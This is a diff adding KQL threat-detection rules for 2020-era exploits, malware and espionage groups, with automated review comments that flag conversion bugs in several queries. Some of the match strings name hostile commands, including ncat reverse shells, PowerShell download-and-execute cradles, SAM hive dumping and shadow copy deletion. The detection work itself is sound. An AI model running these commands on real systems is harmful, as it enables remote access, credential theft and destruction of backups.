@@ -0,0 +1,13 @@ +// Title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry +// Author: EagleEye Team, Florian Roth (Nextron Systems), NVISO +// Date: 2020-05-13 +// Level: high +// Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. +// This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats +// False Positives: +// - New printer port install on host + +DeviceRegistryEvents +| where (RegistryValueData contains ".bat" or RegistryValueData contains ".com" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".ps1" or RegistryValueData contains ".vbe" or RegistryValueData contains ".vbs" or RegistryValueData contains "C:") and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Ports" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql new file mode 100644 index 00000000..d6ec9f06 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql 
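Review bot: The query filters only on `RegistryValueData` and `RegistryKey` and never constrains `ActionType`, so it runs over every DeviceRegistryEvents row under `...\Ports` (key creation/deletion, value deletion) rather than only value writes; the description talks about changes to the key with suspicious data, which presumably corresponds to a `registry_set` source category. Adding `| where ActionType == "RegistryValueSet"` ahead of the existing conditions would restore that scope and cheaply narrow the scan. Note also that `RegistryValueData contains "C:"` is extremely broad on its own (any absolute path qualifies), which is inherited from the source rule but worth calling out in the `False Positives` header.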
@@ -0,0 +1,12 @@ +// Title: Suspicious PrinterPorts Creation (CVE-2020-1048) +// Author: EagleEye Team, Florian Roth +// Date: 2020-05-13 +// Level: high +// Description: Detects new commands that add new printer port which point to suspicious file +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1059.001, cve.2020-1048, detection.emerging-threats +// False Positives: +// - New printer port install on host + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-PrinterPort -Name" and (ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bat")) or ProcessCommandLine contains "Generic / Text Only" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql new file mode 100644 index 00000000..daaeb3ac --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql @@ -0,0 +1,12 @@ +// Title: DNS RCE CVE-2020-1350 +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-15 +// Level: critical +// Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2020-1350, detection.emerging-threats +// False Positives: +// - Unknown but benign sub processes of the Windows DNS service dns.exe + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\System32\\dns.exe" and (not((FolderPath endswith "\\System32\\werfault.exe" or FolderPath endswith "\\System32\\conhost.exe" or FolderPath endswith "\\System32\\dnscmd.exe" or FolderPath endswith "\\System32\\dns.exe"))) \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql new file mode 100644 index 00000000..2db1b864 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql @@ -0,0 +1,10 @@ +// Title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-02-12 +// Level: high +// Description: Detects the execution of the commonly used ZeroLogon PoC executable. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1210, cve.2020-1472, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Administrator" and ProcessCommandLine contains "-c") and (FolderPath endswith "\\cool.exe" or FolderPath endswith "\\zero.exe") and InitiatingProcessFolderPath endswith "\\cmd.exe") and ((ProcessCommandLine contains "taskkill" and ProcessCommandLine contains "/f" and ProcessCommandLine contains "/im") or ProcessCommandLine contains "powershell") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql new file mode 100644 index 00000000..b8923aab --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql 
@@ -0,0 +1,10 @@ +// Title: Blue Mockingbird +// Author: Trent Liffick (@tliffick) +// Date: 2020-05-14 +// Level: high +// Description: Attempts to detect system changes made by Blue Mockingbird +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, attack.t1047, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains "sc config" and ProcessCommandLine contains "wercplsupporte.dll") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine endswith "COR_PROFILER" and FolderPath endswith "\\wmic.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql new file mode 100644 index 00000000..44aba9ba --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql @@ -0,0 +1,10 @@ +// Title: Blue Mockingbird - Registry +// Author: Trent Liffick (@tliffick) +// Date: 2020-05-14 +// Level: high +// Description: Attempts to detect system changes made by Blue Mockingbird +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.t1112, attack.t1047, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql b/KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql new file mode 100644 index 00000000..29d8263c --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql 
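Review bot: `RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"` will never match in Defender for Endpoint, because `ServiceDll` is a value name and DeviceRegistryEvents splits the path into `RegistryKey` (the key) and `RegistryValueName` (the value); the Sysmon-style `TargetObject` concatenation this was converted from does not exist there. The condition should be `RegistryKey endswith "\\Services\\wercplsupport\\Parameters" and RegistryValueName =~ "ServiceDll"`. MDE also commonly reports the resolved control set (`...\\SYSTEM\\ControlSet001\\Services\\...`) rather than `CurrentControlSet`, so the shortened `endswith` above avoids pinning that segment — confirm against live data. This looks like a systematic converter gap (registry value names folded into the key path) rather than a one-off.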
@@ -0,0 +1,10 @@ +// Title: Potential Emotet Rundll32 Execution +// Author: FPT.EagleEye +// Date: 2020-12-25 +// Level: critical +// Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine endswith ",RunDLL" or ProcessCommandLine endswith ",Control_RunDLL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((InitiatingProcessFolderPath endswith "\\tracker.exe" or (ProcessCommandLine endswith ".dll,Control_RunDLL" or ProcessCommandLine endswith ".dll\",Control_RunDLL" or ProcessCommandLine endswith ".dll',Control_RunDLL")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql new file mode 100644 index 00000000..27c971e5 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql 
@@ -0,0 +1,13 @@ +// Title: FlowCloud Registry Markers +// Author: NVISO +// Date: 2020-06-09 +// Level: critical +// Description: Detects FlowCloud malware registry markers from threat group TA410. +// The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}" or RegistryKey contains "\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" or RegistryKey contains "\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" or RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql new file mode 100644 index 00000000..9b82de63 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Ke3chang/TidePool Malware Activity +// Author: Markus Neis, Swisscom +// Date: 2020-06-18 +// Level: high +// Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 +// MITRE Tactic: Defense Evasion +// Tags: attack.g0004, attack.defense-evasion, attack.t1562.001, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "-Property DWORD -name DisableFirstRunCustomize -value 2 -Force" or ProcessCommandLine contains "-Property String -name Check_Associations -value" or ProcessCommandLine contains "-Property DWORD -name IEHarden -value 0 -Force" \ No newline at end of file 
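Review bot: The last disjunct, `RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*"`, carries a literal asterisk — KQL `endswith` does no wildcard expansion, so the term only matches keys whose name actually ends in `*` and the `PrintResponsor` marker is effectively dead. Replace it with `RegistryKey contains "\\SYSTEM\\Setup\\PrintResponsor"` (a trailing Sigma wildcard after a prefix is a `contains`/`startswith`-style match, not `endswith`). It is worth checking the conversion output for other rules where a Sigma `*` survived into a string literal, since the same pattern would silently disable them.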
diff --git a/KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql new file mode 100644 index 00000000..a8e307ec --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Maze Ransomware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-08 +// Level: critical +// Description: Detects specific process characteristics of Maze ransomware word document droppers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.t1047, attack.impact, attack.t1490, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith ".tmp" and InitiatingProcessFolderPath endswith "\\WINWORD.exe") or (ProcessCommandLine endswith "shadowcopy delete" and FolderPath endswith "\\wmic.exe" and InitiatingProcessFolderPath contains "\\Temp\\") or (ProcessCommandLine contains "\\..\\..\\system32" and ProcessCommandLine endswith "shadowcopy delete") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql new file mode 100644 index 00000000..d72fcae8 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql 
@@ -0,0 +1,10 @@ +// Title: Trickbot Malware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-11-26 +// Level: high +// Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559, detection.emerging-threats + +DeviceProcessEvents +| where FolderPath endswith "\\wermgr.exe" and InitiatingProcessCommandLine contains "DllRegisterServer" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql b/KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql new file mode 100644 index 00000000..6799014d --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql @@ -0,0 +1,10 @@ +// Title: EvilNum APT Golden Chickens Deployment Via OCX Files +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-10 +// Level: critical +// Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "/s" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "\\AppData\\Roaming\\" and ProcessCommandLine contains ".ocx" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql b/KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql new file mode 100644 index 00000000..2016ec13 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql 
@@ -0,0 +1,10 @@ +// Title: GALLIUM IOCs +// Author: Tim Burrell +// Date: 2020-02-07 +// Level: high +// Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.command-and-control, attack.t1212, attack.t1071, attack.g0093, detection.emerging-threats + +DeviceProcessEvents +| where (SHA256 startswith "9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd" or SHA256 startswith "7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b" or SHA256 startswith "657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5" or SHA256 startswith "2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29" or SHA256 startswith "52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77" or SHA256 startswith "a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3" or SHA256 startswith "5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022" or SHA256 startswith "6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883" or SHA256 startswith "3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e" or SHA256 startswith "1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7" or SHA256 startswith "fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1" or SHA256 startswith "7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c" or SHA256 startswith "178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945" or SHA256 startswith "51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9" or SHA256 startswith "889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79" or SHA256 startswith "332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf" or SHA256 startswith "44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08" or SHA256 startswith 
"63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef" or SHA256 startswith "056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070") or (SHA1 startswith "53a44c2396d15c3a03723fa5e5db54cafd527635" or SHA1 startswith "9c5e496921e3bc882dc40694f1dcc3746a75db19" or SHA1 startswith "aeb573accfd95758550cf30bf04f389a92922844" or SHA1 startswith "79ef78a797403a4ed1a616c68e07fff868a8650a" or SHA1 startswith "4f6f38b4cec35e895d91c052b1f5a83d665c2196" or SHA1 startswith "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" or SHA1 startswith "e841a63e47361a572db9a7334af459ddca11347a" or SHA1 startswith "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" or SHA1 startswith "2e94b305d6812a9f96e6781c888e48c7fb157b6b" or SHA1 startswith "dd44133716b8a241957b912fa6a02efde3ce3025" or SHA1 startswith "8793bf166cb89eb55f0593404e4e933ab605e803" or SHA1 startswith "a39b57032dbb2335499a51e13470a7cd5d86b138" or SHA1 startswith "41cc2b15c662bc001c0eb92f6cc222934f0beeea" or SHA1 startswith "d209430d6af54792371174e70e27dd11d3def7a7" or SHA1 startswith "1c6452026c56efd2c94cea7e0f671eb55515edb0" or SHA1 startswith "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" or SHA1 startswith "4923d460e22fbbf165bbbaba168e5a46b8157d9f" or SHA1 startswith "f201504bd96e81d0d350c3a8332593ee1c9e09de" or SHA1 startswith "ddd2db1127632a2a52943a2fe516a2e7d05d70d2") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql b/KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql new file mode 100644 index 00000000..3dc358a5 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql 
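Review bot: Every hash predicate in this `where` uses `startswith` with a full-length SHA256 or SHA1 literal, which is equality in all but name (the columns are fixed-length hex) but is expressed as a prefix scan and is harder to read and to extend. The idiomatic form is `SHA256 in~ ("9ae7c4a4...", "7772d624...", ...) or SHA1 in~ ("53a44c23...", ...)`, which states the intent directly and lets the engine treat it as an exact-match set lookup; I would change the converter to emit `in~` for lists of full hashes rather than hand-editing this file. Behavior is unchanged either way, since no hash value is a proper prefix of another.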
@@ -0,0 +1,12 @@ +// Title: Greenbug Espionage Group Indicators +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-20 +// Level: critical +// Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec +// MITRE Tactic: Execution +// Tags: attack.g0049, attack.execution, attack.t1059.001, attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1036.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith ":\\ProgramData\\adobe\\Adobe.exe" or FolderPath endswith ":\\ProgramData\\oracle\\local.exe" or FolderPath endswith "\\revshell.exe" or FolderPath endswith "\\infopagesbackup\\ncat.exe" or FolderPath endswith ":\\ProgramData\\comms\\comms.exe") or (ProcessCommandLine contains "-ExecutionPolicy Bypass -File" and ProcessCommandLine contains "\\msf.ps1") or (ProcessCommandLine contains "infopagesbackup" and ProcessCommandLine contains "\\ncat" and ProcessCommandLine contains "-e cmd.exe") or ProcessCommandLine contains "L3NlcnZlcj1" or (ProcessCommandLine contains "system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill" or ProcessCommandLine contains "-nop -w hidden -c $k=new-object" or ProcessCommandLine contains "[Net.CredentialCache]::DefaultCredentials;IEX " or ProcessCommandLine contains " -nop -w hidden -c $m=new-object net.webclient;$m" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass whoami" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass netstat -a") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql b/KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql new file mode 100644 index 00000000..22ef6268 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql 
@@ -0,0 +1,12 @@ +// Title: Lazarus Group Activity +// Author: Florian Roth (Nextron Systems), wagga +// Date: 2020-12-23 +// Level: critical +// Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity +// MITRE Tactic: Execution +// Tags: attack.g0032, attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "reg.exe save hklm\\sam %temp%\\~reg_sam.save" or ProcessCommandLine contains "1q2w3e4r@#$@#$@#$" or ProcessCommandLine contains " -hp1q2w3e4 " or ProcessCommandLine contains ".dat data03 10000 -p ") or (ProcessCommandLine contains "netstat -aon | find " and ProcessCommandLine contains "ESTA" and ProcessCommandLine contains " > %temp%\\~") or (ProcessCommandLine contains ".255 10 C:\\ProgramData\\IBM\\" and ProcessCommandLine contains ".DAT") or ((ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\RECYCLER\\") and (ProcessCommandLine contains " /c " and ProcessCommandLine contains " -p 0x")) or ((ProcessCommandLine contains ".bin," or ProcessCommandLine contains ".tmp," or ProcessCommandLine contains ".dat," or ProcessCommandLine contains ".io," or ProcessCommandLine contains ".ini," or ProcessCommandLine contains ".db,") and (ProcessCommandLine contains "rundll32 " and ProcessCommandLine contains "C:\\ProgramData\\")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql b/KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql new file mode 100644 index 00000000..8766ef2a --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql 
@@ -0,0 +1,10 @@ +// Title: Leviathan Registry Key Activity +// Author: Aidan Bracher +// Date: 2020-07-07 +// Level: critical +// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql new file mode 100644 index 00000000..b0d8a9b3 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql @@ -0,0 +1,10 @@ +// Title: Suspicious VBScript UN2452 Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects suspicious inline VBScript keywords as used by UNC2452 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "Execute" and ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" and ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion") and (not(ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql new file mode 100644 index 00000000..d5447f08 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql 
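Review bot: The `where RegistryKey contains "...\\CurrentVersion\\Run\\ntkd"` clause carries the Sysmon TargetObject form, where the value name is appended to the key path, but DeviceRegistryEvents reports the value name separately in RegistryValueName and RegistryKey ends at `...\\CurrentVersion\\Run`, so this predicate is unlikely to ever match in MDE. Suggest `| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" and RegistryValueName =~ "ntkd"`. Because this file is converter output, the fix belongs in the registry TargetObject handling of the conversion script as well, otherwise the next scheduled run regenerates the same query.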
@@ -0,0 +1,12 @@ +// Title: UNC2452 PowerShell Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-20 +// Level: critical +// Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.t1047, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "Invoke-WMIMethod win32_process -name create -argumentlist" and ProcessCommandLine contains "rundll32 c:\\windows") or (ProcessCommandLine contains "wmic /node:" and ProcessCommandLine contains "process call create \"rundll32 c:\\windows") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql new file mode 100644 index 00000000..64384954 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql 
@@ -0,0 +1,10 @@ +// Title: UNC2452 Process Creation Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-22 +// Level: high +// Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".txt")) or ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".log")) or ((ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "C:\\Windows" and ProcessCommandLine contains ".dll,Tk_") and (InitiatingProcessCommandLine contains "wscript.exe" and InitiatingProcessCommandLine contains ".vbs")) or (ProcessCommandLine contains "cmd.exe /C " and (InitiatingProcessCommandLine contains "C:\\Windows" and InitiatingProcessCommandLine contains ".dll") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessCommandLine =~ "" and FolderPath endswith "\\dllhost.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql b/KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql new file mode 100644 index 00000000..161f5906 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql 
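Review bot: The last alternative, `ProcessCommandLine =~ "" and FolderPath endswith "\\dllhost.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe"`, depends on an empty command line, but DeviceProcessEvents normally carries at least the image name for a process started without arguments, so this clause is unlikely to fire as written. If the intent is dllhost.exe launched argument-less by rundll32.exe, consider `(ProcessCommandLine =~ "" or ProcessCommandLine =~ "dllhost.exe" or ProcessCommandLine =~ "\"dllhost.exe\"")` and verify against real telemetry before relying on it. The remaining alternatives on the line look consistent with the described 7z/rundll32/wscript patterns.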
@@ -0,0 +1,10 @@ +// Title: TAIDOOR RAT DLL Load +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-30 +// Level: high +// Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1055.001, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "dll,MyStart" or ProcessCommandLine contains "dll MyStart") or (ProcessCommandLine endswith " MyStart" and ProcessCommandLine contains "rundll32.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql new file mode 100644 index 00000000..118003cd --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql 
